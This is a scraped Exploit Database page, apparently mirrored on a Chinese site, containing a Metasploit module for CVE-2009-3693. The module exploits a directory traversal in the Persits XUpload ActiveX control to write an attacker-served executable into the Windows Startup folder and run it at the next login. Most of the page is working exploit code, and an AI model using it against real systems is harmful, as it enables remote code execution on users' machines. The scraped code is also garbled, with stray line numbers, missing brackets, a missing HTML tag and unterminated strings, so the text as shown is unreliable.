Persits XUpload – ActiveX MakeHttpRequest Directory Traversal (Metasploit)

Exploit Database
98 阅读

作者： Metasploit

日期： 2010-11-11
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/16598/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

# $Id: persits_xupload_traversal.rb 10998 2010-11-11 22:43:22Z jduck $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::EXE

def initialize(info = {})

super(update_info(info,

'Name' => 'Persits XUpload ActiveX MakeHttpRequest Directory Traversal',

'Description'=> %q{

This module exploits a directory traversal in Persits Software Inc's

XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.

By passing a string containing "..\\" sequences to the MakeHttpRequest method,

an attacker is able to write arbitrary files to arbitrary locations on disk.

Code execution occurs by writing to the All Users Startup Programs directory.

You may want to combine this module with the use of multi/handler since a

user would have to log for the payloda to execute.

'License'=> MSF_LICENSE,

'Author' => [ 'jduck' ],

'Version'=> '$Revision: 10998 $',

'References' =>

[

[ 'CVE', '2009-3693'],

[ 'OSVDB', '60001'],

[ 'URL', 'http://retrogod.altervista.org/9sg_hp_loadrunner.html' ]

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'Payload'=>

{

'Space'=> 2048,

'Compat' =>

{

'ConnectionType' => '-find',

}

'Platform' => 'win',

'Targets'=>

[

[ 'Automatic',{ } ],

'DisclosureDate' => 'Sep 29 2009',

'DefaultTarget'=> 0))

register_options(

[

OptString.new('PATH', [ true, 'The path to place the executable.', '../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']),

], self.class)

end

def on_request_uri(cli, request)

uri,token = request.uri.split('?', 2)

print_status("request fired : #{uri}")

if !token

# randomize some stuff

objid = rand_text_alpha(rand(100) + 1)

func = rand_text_alpha(rand(100) + 1)

# send the html that makes the payload get downloaded

token = rand_text_numeric(32)

if ("/" == get_resource[-1,1])

exe_uri = get_resource[0, get_resource.length - 1]

else

exe_uri = get_resource

end

exe_uri << "?" + token

exe_host = ""

exe_host << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])

exe_hostport = datastore['SRVPORT']

exe_name = datastore['PATH'].dup

exe_name << rand_text_alphanumeric(rand(100) + 1)

exe_name << ".exe"

html = %Q|<html>

<head>

function #{func}()

{

#{objid}.Server = "#{exe_host}";

#{objid}.Script = "#{exe_uri}";

#{objid}.Port = #{exe_hostport};

#{objid}.MakeHttpRequest("","","#{exe_name}","","")

}

</script>

</head>

</body>

</html>

print_status("Sending exploit html to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client

send_response(cli, html,

{

'Connection' => 'close',

'Pragma' => 'no-cache'

})

return

end

print_status("Sending payload exe to #{cli.peerhost}:#{cli.peerport}...")

return if ((p = regenerate_payload(cli)) == nil)

data = generate_payload_exe({ :code => p.encoded })

# send the exe

send_response(cli, data,

{

'Content-Type' => 'application/octet-stream',

'Connection' => 'close',

'Pragma' => 'no-cache'

})

# Handle the payload

handler(cli)

end